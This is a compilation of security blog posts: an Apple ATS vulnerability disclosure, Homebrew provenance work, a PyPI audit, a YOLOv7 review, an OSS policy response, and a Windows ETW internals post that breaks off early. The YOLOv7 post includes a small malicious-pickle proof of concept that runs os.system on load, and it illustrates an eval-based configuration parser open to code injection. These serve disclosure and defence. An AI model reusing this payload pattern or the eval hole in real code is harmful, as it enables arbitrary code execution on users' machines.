
The issue with ATS in Apple’s macOS and iOS

30 October 2023 at 12:00

By Will Brattain

Trail of Bits is publicly disclosing a vulnerability (CVE-2023-38596) that affects iOS, iPadOS, and tvOS before version 17, macOS before version 14, and watchOS before version 10. The flaw resides in Apple’s App Transport Security (ATS) protocol handling. We discovered that Apple’s ATS fails to require the encryption of connections to IP addresses and *.local hostnames, which can leave applications vulnerable to information disclosure vulnerabilities and machine-in-the-middle (MitM) attacks.

Note: Apple published an advisory on September 18, 2023 confirming that CVE-2023-38596 had been fixed.

Background

ATS is a network security feature enabled by default in applications linked against iOS 9+ and macOS 10.11+ software development kits (SDKs). ATS requires the use of the Transport Layer Security (TLS) protocol for network connections made by an application. Before iOS version 10 and macOS version 10.12, ATS disallowed connections to .local domains and IP addresses by default but allowed for the configuration of exceptions. As of iOS version 10 and macOS version 10.12, connections to .local domains and IP addresses are allowed by default.

Proof of concept

We created a simple app protected by ATS that POSTs to a user-specified URL. The following table summarizes the tests we performed. Notably, to demonstrate the flaw in ATS’s protocol handling, we submitted POST requests to an unencrypted IP address and a *.local domain and observed that the requests succeeded when they should not have, as shown in figure 1.

Note: The URLs with the IP address (http://174.138.48.47/) and the local domain (http://ats-poc.local) both map to http://ie.gy/.

Figure 1: We submitted POST requests to an unencrypted IP address (left) and *.local domain (right). Both requests succeeded.

This behavior demonstrates that ATS requirements are not enforced on requests to .local domains and IP addresses. Thus, network connections established by iOS and macOS apps through the URL Loading System may be susceptible to information disclosure vulnerabilities and MitM attacks—both of which pose a risk to the confidentiality and integrity of transmitted data.

An exploit scenario

An app is designed to securely transfer data to WebDAV servers. The app relies on ATS to ensure that traffic to user-provided URLs (WebDAV servers) is protected using encryption. When a URL is added, the app makes a request to it, and if ATS does not block the connection, it is assumed to be safe.

A user unwittingly adds a URL, specifying an IP address (e.g., http://174.138.48.47/) in the form; ATS allows the connection even though it is not encrypted. The user then accesses the URL from an insecure network, such as public mall WiFi. Because the traffic is not encrypted, an attacker who can capture the network traffic can access all data sent to the server, including Basic auth credentials, which in turn enable the attacker to recover all sensitive data stored on the WebDAV server that is accessible to the compromised user.
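
As a small illustration of why this matters, Basic authentication sent over plaintext HTTP is merely base64-encoded, not encrypted, so a passive observer recovers the credentials directly (the captured header and credentials below are hypothetical):

# Hypothetical captured Authorization header; Basic auth is encoding, not encryption.
import base64

captured_header = "Authorization: Basic YWxpY2U6aHVudGVyMg=="
credentials = base64.b64decode(captured_header.split("Basic ")[1]).decode()
print(credentials)  # alice:hunter2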

Check your apps!

Now that Apple enforces encryption for connections to .local domains and IP addresses, developers whose apps rely on such addresses should verify that they continue to work.

Coordinated disclosure

As part of the disclosure process, we reported the vulnerability to Apple first. The timeline of disclosure is provided below:

  • October 21, 2022: Discovered ATS vulnerability.
  • November 3, 2022: Disclosed the vulnerability to Apple and communicated that we planned to publicly disclose on December 5.
  • November 14, 2022: Apple requested delay to February 2023; we requested details about why the delay was necessary.
  • November 16, 2022: Agreed to delay after Apple explained their internal testing and validation processes.
  • November 28, 2022: Requested a status update from Apple.
  • November 29, 2022: Apple confirmed that they were still investigating the vulnerability.
  • December 9, 2022: Apple confirmed the vulnerability and continued its investigation.
  • January 31, 2023: The release was delayed due to potential impact on apps and developers.
  • March 31, 2023: Requested a status update from Apple.
  • April 10, 2023: Apple indicated they were preparing an update regarding the remediation timeline.
  • April 18, 2023: Apple indicated that a fix would be ready for a post-WWDC beta release.
  • September 18, 2023: Apple published an advisory confirming that CVE-2023-38596 had been fixed.

Adding build provenance to Homebrew

6 November 2023 at 13:00

By William Woodruff

This is a joint post with Alpha-Omega—read their announcement post as well!

We’re starting a new project in collaboration with Alpha-Omega and OpenSSF to improve the transparency and security of Homebrew. This six-month project will bring cryptographically verifiable build provenance to homebrew-core, allowing end users and companies to prove that Homebrew’s packages come from the official Homebrew CI/CD. In a nutshell, Homebrew’s packages will become compliant with SLSA Build L2 (formerly known as Level 2).

As the dominant macOS package manager and popular userspace alternative on Linux, Homebrew facilitates hundreds of millions of package installs per year, including development tools and toolchains that millions of programmers rely on for trustworthy builds of their software. This critical status makes Homebrew a high-profile target for supply chain attacks, which this project will help stymie.

Vulnerable links in the supply chain

The software supply chain is built from individual links, and the attacker’s goal is to break the entire chain by finding and subverting the weakest link. Conversely, the defender aims to strengthen every link because the attacker needs to break only one to win.

Previous efforts to strengthen the entire chain have focused on various links:

  • The security of the software itself: static and dynamic analyses, as well as the rise of programming languages intended to eliminate entire vulnerability classes
  • Transport security: the use of HTTPS and other authenticated, integrity-preserving channels for retrieving and publishing software artifacts
  • Packaging index and manager security: the adoption of 2FA by package indices, as well as technologies like PyPI’s Trusted Publishing for reducing the “blast radius” of package publishing workflows

With this post, we’d like to spotlight another link that urgently needs strengthening: opaque and complex build processes.

Taming beastly builds with verifiable provenance

Software grows in complexity over time, and builds are no exception; modern build processes bear all the hallmarks of a weak link in the software supply chain:

  • Opaque, unauditable build hosts: Much of today’s software is built on hosted CI/CD services, forming an implicit trust relationship. These services inject their dependencies into the build environment and change constantly—often for important reasons, such as patching vulnerable software.
  • Large, dense dependency graphs: We rely more than ever on small third-party dependencies, often maintained (or not) by hobbyists with limited interest or experience in secure development. The pace of development we’ve come to expect necessitates this dense web of small dependencies. Still, their rise (along with the rise of automatic dependency updating) means that all our projects contain dozens of left-pad incidents waiting to happen.
  • Complex, unreproducible build systems and processes: Undeclared and implicit dependencies, environments that cannot be reproduced locally, incorrect assumptions, and race conditions are just a few of the ways in which builds can misbehave or fail to reproduce, leaving engineers in the lurch. These reliability and usability problems are also security problems in our world of CI/CD and real-time security releases.

Taming these complexities requires visibility into them. We must be able to enumerate and formally describe the components of our build systems to analyze them automatically. This goes by many names and covers many techniques (SBOMs, build transparency, reproducibility, etc.), but the basic idea is one of provenance.

At the same time, collecting provenance adds a new link to our chain. Without integrity and authenticity protections, provenance is just another piece of information that an attacker could potentially manipulate.

This brings us to our ultimate goal: provenance that we can cryptographically verify, giving us confidence in our claims about a build’s origin and integrity.

Fortunately, all the building blocks for verifiable provenance already exist: Sigstore gives us strong digital signatures bound to machine (or human) identities, DSSE and in-toto offer standard formats and signing procedures for crafting signed attestations, and SLSA provides a formal taxonomy for evaluating the strength and trustworthiness of our statements.

Verifiable provenance for Homebrew

What does this mean for Homebrew? Once complete, every single bottle provided by homebrew-core will be digitally signed in a way that attests it was built on Homebrew’s trusted CI/CD. Those digital signatures will be provided through Sigstore; the attestations behind them will be performed with the in-toto attestation framework.

Even if an attacker manages to compromise Homebrew’s bottle hosting or otherwise tamper with the contents of the bottles referenced in the homebrew-core formulas, they cannot contrive an authentic digital signature for their changes.

This protection complements Homebrew’s existing integrity and source-side authenticity guarantees. Once provenance on homebrew-core is fully deployed, a user who runs brew install python will be able to prove each of the following:

  1. The formula metadata used to install Python is authenticated, thanks to Homebrew’s signed JSON API.
  2. The bottle has not been tampered with in transit, thanks to digests in the formula metadata.
  3. The bottle was built in a public, auditable, controlled CI/CD environment against a specific source revision.

That last property is brand new and is equivalent to Build L2 in the SLSA taxonomy of security levels.

Follow along!

This work is open source and will be conducted openly, so you can follow our activity. We are actively involved in the Sigstore and OpenSSF Slacks, so please drop in and say hi!

Alpha-Omega, an associated project of OpenSSF, is funding this work. The Alpha-Omega mission is to protect society by catalyzing sustainable security improvements to the most critical open-source software projects and ecosystems. OpenSSF holds regularly scheduled meetings for its working groups and projects, and we’ll be in attendance.

Our audit of PyPI

14 November 2023 at 13:00

By William Woodruff

This is a joint post with the PyPI maintainers; read their announcement here!

This audit was sponsored by the Open Tech Fund as part of their larger mission to secure critical pieces of internet infrastructure. You can read the full report in our Publications repository.

Late this summer, we performed an audit of Warehouse and cabotage, the codebases that power and deploy PyPI, respectively. Our review uncovered a number of findings that, while not critical, could compromise the integrity and availability of both. These findings reflect a broader trend in large systems: security issues largely correspond to places where services interact, particularly where those services have insufficiently specified or weak contracts.

PyPI

PyPI is the Python Package Index: the official and primary packaging index and repository for the Python ecosystem. It hosts half a million unique Python packages uploaded by 750,000 unique users and serves over 26 billion downloads every single month. (That’s over three downloads for every human on Earth, each month, every month!)

Consequently, PyPI’s hosted distributions are essentially the ground truth for just about every program written in Python. Moreover, PyPI is extensively mirrored across the globe, including in countries with limited or surveilled internet access.

Before 2018, PyPI was a large and freestanding legacy application with significant technical debt that accumulated over nearly two decades of feature growth. An extensive rewrite was conducted from 2016 to 2018, culminating in the general availability of Warehouse, the current codebase powering PyPI.

Various significant feature enhancements have been performed since then, including the addition of scoped API tokens, TOTP- and WebAuthn-based MFA, organization accounts, secret scanning, and Trusted Publishing.

Our audit and findings

Under the hood, PyPI is built out of multiple components, including third-party dependencies that are themselves hosted on PyPI. Our audit focused on two of its most central components:

  • Warehouse: PyPI’s “core” back end and front end, including the majority of publicly reachable views on pypi.org, as well as the PEP 503 index, public REST and XML-RPC APIs, and administrator interface
  • cabotage: PyPI’s continuous deployment infrastructure, enabling GitOps-style deployment by the PyPI administrators

Warehouse

We performed a holistic audit of Warehouse’s codebase, including the relatively small amount of JavaScript served to browser clients. Some particular areas of focus included:

  • The “legacy” upload endpoint, which is currently the primary upload mechanism for package submission to PyPI;
  • The administrator interface, which allows admin-privileged users to perform destructive and sensitive operations on the production PyPI instance;
  • All user and project management views, which allow their respectively privileged users to perform destructive and sensitive operations on PyPI user accounts and project state;
  • Warehouse’s AuthN, AuthZ, permissions, and ACL schemes, including the handling and adequate permissioning of different credentials (e.g., passwords, API tokens, OIDC credentials);
  • Third-party service integrations, including integrations with GitHub secret scanning, the PyPA Advisory Database, email delivery and state management through AWS SNS, and external object storages (Backblaze B2, AWS S3);
  • All login and authentication flows, including TOTP and WebAuthn-based MFA flows as well as account recovery and password reset flows.

During our review, we uncovered a number of findings that, while not critical, could potentially compromise Warehouse’s availability, integrity, or the integrity of its hosted distributions. We also uncovered a finding that would allow an attacker to disclose ordinarily private account information. Following a post-audit fix review, we believe that each of these findings has been mitigated sufficiently or does not pose an immediate risk to PyPI’s operations.

Findings of interest include:

  • TOB-PYPI-2: weak signature verification could allow an attacker to manipulate PyPI’s AWS SNS integration, including topic subscriptions and bounce/complaint notices against individual user emails.
  • TOB-PYPI-5: an attacker could use an unintentional information leak on the upload endpoint as a reconnaissance oracle, determining account validity without triggering ordinary login attempt events.
  • TOB-PYPI-14: an attacker with access to one or more of PyPI’s object storage services could cause cache poisoning or confusion due to weak cryptographic hashes.

Our overall evaluation of Warehouse is reflected in our report: Warehouse’s design and development practices are consistent with industry-standard best practices, including the enforcement of ordinarily aspirational practices such as 100% branch coverage, automated quality and security linting, and dependency updates.

cabotage

Like with Warehouse, our audit of cabotage was holistic. Some particular areas of focus included:

  • The handling of GitHub webhooks and event payloads, including container and build dispatching logic based on GitHub events;
  • Container and image build and orchestration;
  • Secrets handling and log filtering;
  • The user-facing cabotage web application, including all form and route logic.

During our review, we uncovered a number of findings that, while not critical, could potentially compromise cabotage’s availability and integrity, as well as the availability and integrity of the containers that it builds and deploys. We also uncovered two findings that could allow an attacker to circumvent ordinary access controls or log filtering mechanisms. Following a post-audit fix review, we believe that these findings have been mitigated sufficiently or do not pose an immediate risk to PyPI’s operations (or other applications deployed through cabotage).

Findings of interest include:

  • TOB-PYPI-17: an attacker with build privileges on cabotage could potentially pivot into backplane control of cabotage itself through command injection.
  • TOB-PYPI-19: an attacker with build privileges on cabotage could potentially pivot into backplane control of cabotage itself through a crafted hosted application Procfile.
  • TOB-PYPI-20: an attacker with deployment privileges on cabotage could potentially deploy a legitimate-looking-but-inauthentic image due to GitHub commit impersonation.

From the report, our overall evaluation is that cabotage’s codebase is not as mature as Warehouse’s. In particular, our evaluation reflects operational deficiencies that are not shared with Warehouse: cabotage has a single active maintainer, has limited available public documentation, does not have a complete unit test suite, and does not use a CI/CD system to automatically run tests or evaluate code quality metrics.

Takeaways

Unit testing, automated linting, and code scanning are all necessary components in a secure software development lifecycle. At the same time, as our full report demonstrates, they cannot guarantee the security of a system or design: manual code review remains invaluable for catching interprocedural and systems-level flaws.

We worked closely with the PyPI maintainers and administrators throughout the audit and would like to thank them for sharing their extensive knowledge and expertise, as well as for actively triaging reports submitted to them. In particular, we would like to thank Mike Fiedler, the current PyPI Safety & Security Engineer, for his documentation and triage efforts before, during, and after the engagement period.

Assessing the security posture of a widely used vision model: YOLOv7

15 November 2023 at 15:15

By Alvin Crighton, Anusha Ghosh, Suha Hussain, Heidy Khlaaf, and Jim Miller

TL;DR: We identified 11 security vulnerabilities in YOLOv7, a popular computer vision framework, that could enable attacks including remote code execution (RCE), denial of service, and model differentials (where an attacker can trigger a model to perform differently in different contexts).

Open-source software provides the foundation of many widely used ML systems. However, these frameworks have been developed rapidly, often at the cost of secure and robust practices. Furthermore, these open-source models and frameworks are not specifically intended for critical applications, yet they are being adopted for such applications at scale, through momentum or popularity. Few of these software projects have been rigorously reviewed, leading to latent risks and a rise of unidentified supply chain attack surfaces that impact the confidentiality, integrity, and availability of the model and its associated assets. For example, pickle files, used widely in the ML ecosystem, can be exploited to achieve arbitrary code execution.
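
For instance, here is a minimal sketch of that exploit class (the class name and payload below are hypothetical):

# Hypothetical malicious pickle: the GLOBAL and REDUCE opcodes call os.system at load time.
import os
import pickle

class MaliciousModel:
    def __reduce__(self):
        return (os.system, ("echo code execution during unpickling",))

payload = pickle.dumps(MaliciousModel())
pickle.loads(payload)  # merely loading the file runs the attacker's command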

Given these risks, we decided to assess the security of a popular and well-established vision model: YOLOv7. This blog post shares and discusses the results of our review, which comprised a lightweight threat model and secure code review, including our conclusion that the YOLOv7 codebase is not suitable for mission-critical applications or applications that require high availability. A link to the full public report is available here.

Disclaimer: YOLOv7 is a product of academic work. Academic prototypes are not intended to be production-ready, nor do they necessarily have appropriate security hygiene, and our review is not intended as a criticism of the authors or their development choices. However, as with many ML prototypes, YOLOv7 has been adopted within production systems (e.g., it is promoted by Roboflow, and the repository has 3.5k forks). Our review is only intended to bring to light the risks of using such prototypes without further security scrutiny.

As part of our responsible disclosure policy, we contacted the authors of the YOLOv7 repository to make them aware of the issues we identified. We did not receive a response, but we propose concrete solutions and changes that would mitigate the identified security gaps.

What is YOLOv7?

You Only Look Once (YOLO) is a state-of-the-art, real-time object detection system whose combination of high accuracy and good performance has made it a popular choice for vision systems embedded in mission-critical applications such as robotics, autonomous vehicles, and manufacturing. YOLOv1 was initially developed in 2015; its latest version, YOLOv7, is the open-source codebase revision of YOLO developed by Academia Sinica that implements their corresponding academic paper, which outlines how YOLOv7 outperforms both transformer-based object detectors and convolutional-based object detectors (including YOLOv5).

The codebase has over 3k forks and allows users to provide their own pre-trained files, model architecture, and dataset to train custom models. Even though YOLOv7 is an academic project, YOLO is the de facto algorithm in object detection, and is often used commercially and in mission-critical applications (e.g., by Roboflow).

What we found

Our review identified five high-severity and three medium-severity findings, which we attribute to the following insecure practices: 

  • The codebase is not written defensively; it has no unit tests or testing framework, and inputs are poorly validated and sanitized.
  • Complete trust is placed in model and configuration files that can be pulled from external sources.
  • The codebase dangerously and unnecessarily relies on permissive functions in ways that introduce vectors for RCE. 

The table below summarizes our high-severity findings:

Note: It is common practice to download datasets, model pickle files, and YAML configuration files from external sources, such as PyTorch Hub. To compromise these files on a target machine, an attacker could upload a malicious file to one of these public sources.

Building the threat model

For our review, we first carried out a lightweight threat model to identify threat scenarios and the most critical components that would in turn inform our code review. Our approach draws from Mozilla’s “Rapid Risk Assessment” methodology and NIST’s guidance on data-centric threat modeling (NIST 800-154). We reviewed YOLO academic papers, the YOLOv7 codebase, and user documentation to identify all data types, data flow, trust zones (and their connections), and threat actors. These artifacts were then used to develop a comprehensive list of threat scenarios that document each of the possible threats and risks present in the system.

The threat model accounts for the ML pipeline’s unique architecture (relative to traditional software systems), which introduces novel threats and risks due to new attack surfaces within the ML lifecycle and pipeline such as data collection, model training, and model inference and deployment. Corresponding threats and failures can lead to the degradation of model performance, exploitation of the collection and processing of data, and manipulation of the resulting outputs. For example, downloading a dataset from an untrusted or insecure source can lead to dataset poisoning and model degradation.

Our threat model thus aims to examine ML-specific areas of entry as well as outline significant sub-components of the YOLOv7 codebase. Based on our assessment of YOLOv7 artifacts, we constructed the following data flow diagram.

Figure 1: Data flow diagram produced during the lightweight threat model

Note that this diagram and our threat model do not target a specific application or deployment environment. Our identified scenarios were tailored to bring focus to general ML threats that developers should consider before deploying YOLOv7 within their ecosystem. We identified a total of twelve threat scenarios pertaining to three primary threats: dataset compromise, host compromise, and YOLO process compromise (such as injecting malicious code into the YOLO system or one of its dependencies).

Code review results

Next, we performed a secure code review of the YOLOv7 codebase, focusing on the most critical components identified in the threat model’s threat scenarios. We used both manual and automated testing methods; our automated testing tools included Trail of Bits’ repository of custom Semgrep rules, which target the misuse of ML frameworks such as PyTorch and which identified one security issue and several code quality issues in the YOLOv7 codebase. We also used the TorchScript automatic trace checking tool to automatically detect potential errors in traced models. Finally, we used the public Python CodeQL queries across the codebase and identified multiple code quality issues.

In total, our code review resulted in the discovery of twelve security issues, five of which are high severity. The review also uncovered twelve code quality findings that serve as recommendations for enhancing the quality and readability of the codebase and preventing the introduction of future vulnerabilities.

All of these findings are indicative of a system that was not written or designed with a defensive lens:

  • Five security issues could individually lead to RCE, most of which are caused by the unnecessary and dangerous use of permissive functions such as subprocess.check_output, eval, and os.system. See the highlight below for an example. 
  • User and external data inputs are poorly validated and sanitized. Multiple issues enable a denial-of-service attack if an end user can control certain inputs, such as model files, dataset files, or configuration files (TOB-YOLO-9, TOB-YOLO-8, TOB-YOLO-12). For example, the codebase allows engineers to provide their own configuration files, whether they represent a different model architecture or are pre-trained files (given the different applications of the YOLO model architecture). These files and datasets are loaded into the training network where PyTorch is used to train the model. For a more secure design, the amount of trust placed into external inputs needs to be drastically reduced, and these values need to be carefully sanitized and validated.
  • There are currently no unit tests or any testing framework in the codebase (TOB-YOLO-11). A proper testing framework would have prevented some of the issues we uncovered, and without this framework it is likely that other implementation flaws and bugs exist in the codebase. Moreover, as the system continues to evolve, without any testing, code regressions are likely to occur.

Below, we highlight some of the details of our high-severity findings and discuss their repercussions on ML-based systems.

Secure code review highlight #1: How YAML parsing leads to RCE

Our most notable finding regards the insecure parsing of YAML files that could result in RCE. Like many ML systems, YOLO uses YAML files to specify the architecture of models. Unfortunately, the YAML parsing function, parse_model, parses the contents of the file by calling eval on unvalidated contents of the file, as shown in this code snippet:

Figure 2: Snippet of parse_model in models/yolo.py
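
As a rough illustration of the pattern (not the actual parse_model implementation; the YAML layout and helper name below are assumptions), a parser that builds layers by calling eval on strings taken from a configuration file looks something like this:

# Illustrative sketch only -- not the YOLOv7 code.
import yaml
import torch.nn as nn

def parse_model_config(path):
    with open(path) as f:
        cfg = yaml.safe_load(f)
    layers = []
    for module_name, args in cfg["backbone"]:
        # eval() turns config strings into arbitrary Python, so a crafted entry
        # such as "__import__('os').system('...')" executes during parsing.
        module_cls = eval(module_name)  # e.g., "nn.Conv2d"
        layers.append(module_cls(*(eval(str(a)) for a in args)))
    return nn.Sequential(*layers)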

If an attacker is able to manipulate one of these YAML files used by a target user, they could inject malicious code that would be executed during parsing. This is particularly concerning because these YAML files are often obtained from third-party websites that host them along with other model files and datasets, and a sophisticated attacker could compromise one of these third-party services or hosted assets. However, the issue can be detected by carefully and regularly inspecting these YAML files.

Given the potential severity of this finding, we proposed an alternative implementation as a mitigation: remove the need for the parse_model function altogether by rewriting the given architectures defined in config files as different block classes that call standard PyTorch modules. This rewrite serves a few different purposes:

  • It removes the inherent vulnerability present in calling eval on unsanitized input.
  • The block class structure more effectively replicates the architecture proposed in the implemented paper, allowing for easier replication of the given architecture and definition of subsequent iterations of similar structures.
  • It presents a more extensible base to continue defining configurations, as the classes are easily modifiable based on different parameters set by the user.
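
For illustration, here is a minimal sketch of what one such block class might look like (assuming standard PyTorch modules; this is not the actual proposed patch):

# Each architecture block becomes an explicit nn.Module, so no eval() of config strings is needed.
import torch
import torch.nn as nn

class ConvBlock(nn.Module):
    """Conv -> BatchNorm -> SiLU, parameterized by plain constructor arguments."""
    def __init__(self, in_ch, out_ch, kernel=3, stride=1):
        super().__init__()
        self.conv = nn.Conv2d(in_ch, out_ch, kernel, stride, padding=kernel // 2, bias=False)
        self.bn = nn.BatchNorm2d(out_ch)
        self.act = nn.SiLU()

    def forward(self, x):
        return self.act(self.bn(self.conv(x)))

# Config values are now validated constructor arguments rather than eval()'d strings:
block = ConvBlock(3, 32)
print(block(torch.randn(1, 3, 64, 64)).shape)  # torch.Size([1, 32, 64, 64])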

Our proposed fix can be tracked here.

Secure code review highlight #2: ML-specific vulnerabilities and improvements

As previously noted, ML frameworks are leading to a rise of novel attack avenues targeting confidentiality, integrity, and availability of the model and its associated assets. Highlights from the ML-specific issues that we uncovered during our security assessment include the following:

  • The YOLOv7 codebase uses pickle files to store models and datasets; these files have not been verified and may have been obtained from third-party sources. We previously found that the widespread use of pickle files in the ML ecosystem is a security risk, as pickle files enable arbitrary code execution. To deserialize a pickle file, a virtual machine known as the Pickle Machine (PM) interprets the file as a sequence of opcodes. Two opcodes contained in the PM, GLOBAL and REDUCE, can execute arbitrary Python code outside of the PM, thereby enabling arbitrary code execution. We built and released fickling, a tool to reverse engineer and analyze pickle files; however, we further recommend that ML implementations use safer file formats instead, such as safetensors.
  • The way YOLOv7 traces its models could lead to model differentials—that is, the traced model that is being deployed behaves differently from the original, untraced model. In particular, YOLO uses PyTorch’s torch.jit.trace to convert its models into the TorchScript format for deployment. However, the YOLOv7 models contain many tracer edge cases: elements of the model that are not accurately captured by tracing. The most notable occurrence was the inclusion of input-dependent control flow. We used TorchScript’s automatic trace checker to confirm this divergence by generating an input that had different outputs depending on whether or not the model was traced, which could lead to backdoors. An attacker could release a model that exhibits a specific malicious behavior only when it is traced, making it harder to catch.
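
To make the traced-versus-eager divergence concrete, here is a toy module (not YOLOv7 code) with input-dependent control flow; tracing freezes whichever branch the example input takes, and torch.jit.trace’s check_inputs option can be used to surface the mismatch:

# Toy example: tracing bakes in the branch taken by the example input.
import torch
import torch.nn as nn

class Gate(nn.Module):
    def forward(self, x):
        if x.sum() > 0:  # data-dependent branch: only one side survives tracing
            return x + 1
        return x - 1

model = Gate()
traced = torch.jit.trace(model, torch.ones(3))  # emits a TracerWarning about the branch

x = -torch.ones(3)
print(model(x))   # eager model takes the "else" branch -> tensor([-2., -2., -2.])
print(traced(x))  # traced model always computes x + 1  -> tensor([0., 0., 0.])

# Re-checking the trace with an input that takes the other branch flags the divergence:
# torch.jit.trace(model, torch.ones(3), check_inputs=[(-torch.ones(3),)])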

Specific recommendations and mitigations are outlined in our report.

Enhancing YOLOv7’s security

Beyond the identified code review issues, a series of design and operational changes are needed to ensure sufficient security posture. Highlights from the list of strategic recommendations provided in our report include:

  • Implementing an adequate testing framework with comprehensive unit tests and integration tests
  • Removing the use of highly permissive functions, such as subprocess.check_output, eval, and os.system
  • Improving the development process of the codebase
  • Enforcing the usage of secure protocols, such as HTTPS and RTMPS, when available
  • Continuously updating dependencies to ensure upstream security fixes are applied
  • Providing documentation to users about the potential threats when using data from untrusted training data or webcam streams

Although the identified security gaps may be acceptable for academic prototypes, we do not recommend using YOLOv7 within mission-critical applications or domains, despite existing use cases. For affected end users who are already using and deploying YOLOv7, we strongly recommend disallowing end users from providing datasets, model files, configuration files, and any other type of external inputs until the recommended changes are made to the design and maintenance of YOLOv7.

Coordinated disclosure timeline

As part of the disclosure process, we reported the vulnerabilities to the YOLOv7 maintainers first. Despite multiple attempts, we were not able to establish contact with the maintainers in order to coordinate fixes for these vulnerabilities. As a result, at the time of this blog post being released, the identified issues remain unfixed. As mentioned, we have proposed a fix to one of the issues that is being tracked here. The timeline of disclosure is provided below:

  • May 24, 2023: We notified the YOLOv7 maintainers that we intend to review the YOLOv7 codebase for internal purposes and invited them to participate and engage in our audit.
  • June 9, 2023: We notified the maintainers that we have begun the audit, and again invited them to participate and engage with our efforts.
  • July 10, 2023: We notified the maintainers that we had several security findings and requested engagement to discuss them.
  • July 26, 2023: We informed the maintainers of our official security disclosure notice with a release date of August 21, 2023.
  • November 15, 2023: The disclosure blog post was released and issues were filed with the original project repository.

How CISA can improve OSS security

20 November 2023 at 14:35

By Jim Miller

The US government recently issued a request for information (RFI) about open-source software (OSS) security. In this blog post, we will present a summary of our response and proposed solutions. Some of our solutions include rewriting widely used legacy code in memory safe languages such as Rust, funding OSS solutions to improve compliance, sponsoring research and development of vulnerability tracking and analysis tools, and educating developers on how to reduce attack surfaces and manage complex features.

Background details

The government entities responsible for the RFI were the Office of the National Cyber Director (ONCD), Cybersecurity and Infrastructure Security Agency (CISA), National Science Foundation (NSF), Defense Advanced Research Projects Agency (DARPA), and Office of Management and Budget (OMB). The specific objective of this RFI was to gather public comments on future priorities and long-term areas of focus for OSS security. This RFI is a key part of the ongoing efforts by these organizations to identify systemic risks in OSS and foster the long-term sustainability of OSS communities.

The RFI includes five potential areas for long-term focus and prioritization. In response to this request, we are prioritizing the “Securing OSS Foundations” area and each of its four sub-areas: fostering the adoption of memory-safe programming languages, strengthening software supply chains, reducing entire classes of vulnerabilities at scale, and advancing developer education. We will provide suggested solutions for each of these four sub-areas below.

Fostering the adoption of memory-safe programming languages

Memory corruption vulnerabilities remain a grave threat to OSS security. This is demonstrated by the number and impact of several vulnerabilities such as the recent heap buffer overflow in libwebp, which was actively being exploited while we drafted our RFI response. Exploits such as these illustrate the need for solutions beyond runtime mitigations, and languages like Rust, which provide both memory and type safety, are the most promising.

In addition to dramatically reducing vulnerabilities, Rust also blends well with legacy codebases, offers high performance, and is relatively easy to use. Thus, our proposed solution centers on sponsoring strategic rewrites of important legacy codebases. Since rewrites are very costly, we specifically recommend undertaking a comprehensive and systematic analysis to identify the most suitable OSS candidates for transitioning to memory-safe languages like Rust. We propose a strong focus on software components that are widely used, poorly covered by tests, and prone to such memory safety vulnerabilities.

Strengthening software supply chains

Supply chain attacks, as demonstrated by the 2020 SolarWinds hack, represent another significant risk to OSS security. Supply chain security is a complex and multifaceted problem. Therefore, we propose improving protections across the entire software supply chain—from individual developers, to package indices, to downstream users.

Our suggested strategy includes establishing “strong link” guidelines that CISA could release. These would provide guidance for each of the critical OSS components: OSS developers, repository hosts, package indices, and consumers. In addition to this guidance, we also propose funding OSS solutions that better enable compliance, such as improving software bill of materials (SBOM) fidelity by integrating with build systems.

Reducing entire classes of vulnerabilities at scale

Another area of focus should be on large-scale reduction of vulnerabilities in the OSS ecosystem. Efforts such as OSS-Fuzz have successfully mitigated thousands of potential security issues, and we propose funding similar projects using this as a model. In addition, vulnerability tracking tools (like cargo-audit and pip-audit) have been successful at quickly remediating vulnerabilities that affect a wide number of users. A critical part of effectively maintaining these tools is properly maintaining the vulnerability database and not allowing over-reporting of insignificant security issues that could result in security fatigue, where developers ignore alerts because there are too many to process.

Therefore, our proposed solution is sponsoring the development and maintenance of tools for vulnerability tracking, analysis tools like Semgrep and CodeQL, and other novel techniques that could work at scale. We also recommend sponsoring research pertaining to novel tools and techniques to help solve specific high-value problems, such as secure HTTP parsing.

Advancing developer education

Lastly, we believe that improving developer education is an important long-term focus area for OSS security. In contrast to current educational efforts, which focus primarily on common vulnerabilities, we propose fostering an extension of developer education that covers areas like reducing attack surfaces, managing complex features, and “shifting left.” If done effectively, creating documentation and training materials specifically for these areas could have a substantially positive, long-term impact on OSS security.

Looking ahead

Addressing OSS security can be a complex challenge, but by making targeted interventions in these four areas, we can make significant improvements. We believe the US government can maximize impact through a combination of three strategies: providing comprehensive guidance, allocating funding through agencies like DARPA and ONR, and fostering collaboration with OSS foundations like OSTIF, OTF, and OpenSSF. This combined approach will enable the sponsorship and monetary support necessary to drive the research and engineering tasks outlined in our proposed solutions.

Together, these actions can build a safer future for open-source software. We welcome the initiative by ONCD, CISA, NSF, DARPA, and OMB for fostering such an open discussion and giving us the chance to contribute.

We welcome you to read our full response.

ETW internals for security research and forensics

22 November 2023 at 12:00

By Yarden Shafir

Why has Event Tracing for Windows (ETW) become so pivotal for endpoint detection and response (EDR) solutions in Windows 10 and 11? The answer lies in the value of the intelligence it provides to security tools through secure ETW channels, which are now also a target for offensive researchers looking to bypass detections.

In this deep dive, we’re not just discussing ETW’s functionalities; we’re exploring how ETW works internally so you can conduct novel research or forensic analysis on a system. Security researchers and malware authors already target ETW. They have developed several techniques to tamper with or bypass ETW-based EDRs, hook system calls, or gain access to ETW providers normally reserved for anti-malware solutions. Most recently, the Lazarus Group bypassed EDR detection by disabling ETW providers. Here, we’ll explain how ETW works and what makes it such a tempting target, and we’ll embark on an exciting journey deep into Windows.

Overview of ETW internals

Two main components of ETW are providers and consumers. Providers send events to an ETW globally unique identifier (GUID), and the events are written to a file, a buffer in memory, or both. Every Windows system has hundreds or thousands of providers registered. We can view available providers by running the command logman query providers:

Checking my system, I can see there are nearly 1,200 registered providers:

Each of these ETW providers defines its own events in a manifest file, which is used by consumers to parse provider-generated data. ETW providers may define hundreds of different event types, so the amount of information we can get from ETW is enormous. Most of these events can be seen in Event Viewer, a built-in Windows tool that consumes ETW events. But you’ll only see some of the data. Not all logs are enabled by default in Event Viewer, and not all event IDs are shown for each log.

On the other side we have consumers: trace logging sessions that receive events from one or several providers. For example, EDRs that rely on ETW data for their detection will consume events from security-related ETW channels such as the Threat Intelligence channel.

We can look at all running ETW consumers via Performance Monitor; clicking one of the sessions will show the providers it subscribes to. (You may need to run as SYSTEM to see all ETW logging sessions.)

The list of processes that receive events from this log session is useful information but not easy to obtain. As far as I could see, there is no way to get that information from user mode at all, and even from kernel mode it’s not an easy task unless you are very familiar with ETW internals. So we will see what we can learn from a kernel debugging session using WinDbg.

Finding ETW consumer processes

